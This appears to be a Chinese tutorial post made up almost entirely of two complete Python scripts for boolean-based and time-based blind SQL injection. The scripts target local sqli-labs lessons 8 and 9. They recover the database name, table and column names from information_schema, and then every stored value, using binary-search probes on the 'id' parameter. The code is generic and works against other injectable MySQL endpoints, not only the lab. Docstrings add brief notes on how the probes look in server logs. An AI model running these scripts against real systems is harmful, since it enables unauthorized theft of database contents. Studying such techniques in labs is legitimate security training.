时间盲注、boolean盲注,获取表、列、具体数据的函数

boolean盲注

import requests
 
def boolean_based_injection(url, payload_template):
    """
    Recover a string value through a Boolean oracle, one character at a time.

    The template is filled with ``i`` (1-based character position) and
    ``mid`` (the ASCII code the server-side comparison is made against) and
    sent as the ``id`` query parameter.  A response body containing
    ``"You are in"`` is read as "true" (the real code is above ``mid``);
    anything else is read as "false".  Each character is therefore found by
    a binary search over codes 32..127.

    Only positions 1..49 are probed (``range(1, 50)``), and extraction stops
    as soon as the inferred code is 32, so the result is cut at the first
    space or at the end of the value.  The partial result is printed after
    every character.

    From the defending side this leaves a burst of requests that differ only
    in the position/threshold numbers inside ``id`` -- a pattern that stands
    out in access logs.

    :param url: target URL; the payload goes into the ``id`` query parameter
    :param payload_template: ``str.format`` template using ``{i}`` and ``{mid}``
    :return: the characters recovered before the loop stopped
    """
    recovered = []
    for position in range(1, 50):
        lo, hi = 32, 128
        while lo < hi:
            guess = (lo + hi) // 2
            probe = payload_template.format(i=position, mid=guess)
            body = requests.get(url, params={"id": probe}).text
            if "You are in" in body:
                lo = guess + 1  # "true": the real code is greater than the guess
            else:
                hi = guess
        if lo == 32:
            break
        recovered.append(chr(lo))
        print(f"Current result: {''.join(recovered)}")
    return ''.join(recovered)
 
def get_database_name(url):
    """Return the name of the current database, recovered via ``database()``."""
    template = "1' and ascii(substr(database(), {i}, 1)) > {mid}-- "
    return boolean_based_injection(url, template)
 
def get_all_table_names(url, database_name):
    """
    Return the table names of ``database_name`` listed in information_schema.

    Rows are read one at a time with ``limit N,1`` for N in 0..19; the scan
    stops at the first index for which nothing is recovered.  Each name is
    printed as it is found.

    :param url: target URL
    :param database_name: schema to list (inserted verbatim into the query)
    :return: list of table names, in ``limit`` order
    """
    found = []
    for n in range(20):
        template = (
            "1' and ascii(substr((select table_name from information_schema.tables "
            "where table_schema='{db}' limit {n},1), {{i}}, 1)) > {{mid}}-- "
        ).format(db=database_name, n=n)
        name = boolean_based_injection(url, template)
        if not name:
            break
        found.append(name)
        print(f"Found table: {name}")
    return found
 
def get_all_column_names(url, database_name, table_name):
    """
    Return the column names of ``database_name.table_name`` from information_schema.

    Rows are read one at a time with ``limit N,1`` for N in 0..19; the scan
    stops at the first index for which nothing is recovered.  Each name is
    printed as it is found.

    :param url: target URL
    :param database_name: schema of the table (inserted verbatim into the query)
    :param table_name: table to describe (inserted verbatim into the query)
    :return: list of column names, in ``limit`` order
    """
    found = []
    for n in range(20):
        template = (
            "1' and ascii(substr((select column_name from information_schema.columns "
            "where table_schema='{db}' and table_name='{tbl}' limit {n},1), {{i}}, 1)) > {{mid}}-- "
        ).format(db=database_name, tbl=table_name, n=n)
        name = boolean_based_injection(url, template)
        if not name:
            break
        found.append(name)
        print(f"Found column: {name}")
    return found
 
def get_all_data(url, database_name, table_name, column_name):
    """
    Return the values of one column, one row per ``limit N,1`` for N in 0..49.

    The scan stops at the first index for which nothing is recovered (an
    empty or NULL cell therefore ends it early).  Each value is printed as it
    is found.

    :param url: target URL
    :param database_name: schema (inserted verbatim into the query)
    :param table_name: table (inserted verbatim into the query)
    :param column_name: column (inserted verbatim into the query)
    :return: list of recovered cell values, in ``limit`` order
    """
    rows = []
    for n in range(50):
        template = (
            "1' and ascii(substr((select {col} from {db}.{tbl} limit {n},1), "
            "{{i}}, 1)) > {{mid}}-- "
        ).format(col=column_name, db=database_name, tbl=table_name, n=n)
        value = boolean_based_injection(url, template)
        if not value:
            break
        rows.append(value)
        print(f"Found data: {value}")
    return rows
 
if __name__ == '__main__':
    # Local sqli-labs Less-8 endpoint, the Boolean oracle the helpers above expect.
    url = 'http://127.0.0.1:81/sqli-labs-master//Less-8/index.php'

    # 1. current database
    db_name = get_database_name(url)
    print("Database name:", db_name)

    # 2. its tables
    tables = get_all_table_names(url, db_name)
    print("All tables:", tables)

    # 3. for each table: columns, then every column's values
    for table in tables:
        print("\nTable:", table)
        columns = get_all_column_names(url, db_name, table)
        print("Columns:", columns)
        for column in columns:
            print("\nColumn:", column)
            data = get_all_data(url, db_name, table, column)
            print("Data:", data)

运行结果(部分):

 

时间盲注 

import time
import requests
 
 
def blind_injection(url, payload_template, max_length=20):
    """
    Recover a string value through a timing oracle, one character at a time.

    Works like a Boolean blind probe, but the signal is the round-trip time
    rather than the response body: a request that takes 3 seconds or longer
    is read as "true" (the real ASCII code is above ``mid``), a faster one as
    "false".  The delay is expected to come from the payload itself (see the
    ``sleep(3)`` that ``get_data`` builds in); network latency is not
    subtracted, so a slow link can be misread as "true".

    Positions 1..``max_length`` are probed with a binary search over codes
    32..127; extraction stops when the inferred code is 32 (end of value or
    a space).  The partial result is printed after every character.

    On the server side these probes show up as many ``id`` values containing
    ``sleep(...)`` and as a step-like rise in response time -- both are easy
    to alert on.

    :param url: target URL; the payload goes into the ``id`` query parameter
    :param payload_template: ``str.format`` template using ``{i}`` and ``{mid}``
    :param max_length: number of character positions to probe
    :return: the characters recovered before the loop stopped
    """
    chars = []
    for position in range(1, max_length + 1):
        lo, hi = 32, 128
        while lo < hi:
            guess = (lo + hi) // 2
            probe = payload_template.format(i=position, mid=guess)
            started = time.time()
            requests.get(url, params={"id": probe})
            elapsed = time.time() - started
            # a delayed answer is the "true" branch of the comparison
            if elapsed >= 3:
                lo = guess + 1
            else:
                hi = guess
        if lo == 32:
            break
        chars.append(chr(lo))
        print(f"Current result: {''.join(chars)}")
    return ''.join(chars)
 
 
def get_data(url, query_template, max_items=20, max_length=20):
    """
    Collect the rows of a single-column query through the timing oracle.

    ``query_template`` is a ``str.format`` template with an ``{index}``
    placeholder (``limit {index},1`` selects one row at a time).  For each
    index the sub-query is wrapped in ``if(... > {mid}, sleep(3), 0)`` so a
    "true" comparison delays the response, and ``blind_injection`` turns that
    delay into characters.  Collection stops at the first index that yields
    an empty result, or after ``max_items`` rows.  Each row is printed as it
    is found.

    :param url: target URL
    :param query_template: SQL sub-query template containing ``{index}``
    :param max_items: maximum number of rows to fetch
    :param max_length: maximum characters to recover per row
    :return: list of recovered strings, in index order
    """
    rows = []
    for index in range(max_items):
        inner = query_template.format(index=index)
        template = "1' and if(ascii(substr((" + inner + "), {i}, 1)) > {mid}, sleep(3), 0)-- "
        item = blind_injection(url, template, max_length)
        if not item:
            break
        rows.append(item)
        print(f"Found item: {item}")
    return rows
 
 
if __name__ == '__main__':
    # Local sqli-labs Less-9 endpoint, the timing oracle get_data expects.
    url = 'http://127.0.0.1:81/sqli-labs-master/Less-9/index.php'

    # 1. current database (a single row, so max_items=1)
    database_name = get_data(url, "select database()", max_items=1)[0]
    print("Database name:", database_name)

    # 2. its tables ({{index}} stays a literal {index} for get_data to fill in)
    table_names = get_data(
        url,
        f"select table_name from information_schema.tables where table_schema='{database_name}' limit {{index}},1",
    )
    print("All table names:", table_names)

    # 3. for each table: columns, then every column's values
    for table_name in table_names:
        print("\nTable:", table_name)
        column_names = get_data(
            url,
            f"select column_name from information_schema.columns where table_schema='{database_name}' and table_name='{table_name}' limit {{index}},1",
        )
        print("Columns:", column_names)

        for column_name in column_names:
            print("\nColumn:", column_name)
            data = get_data(
                url,
                f"select {column_name} from {database_name}.{table_name} limit {{index}},1",
                max_items=50,
                max_length=50,
            )
            print("Data:", data)

运行结果(部分):

 
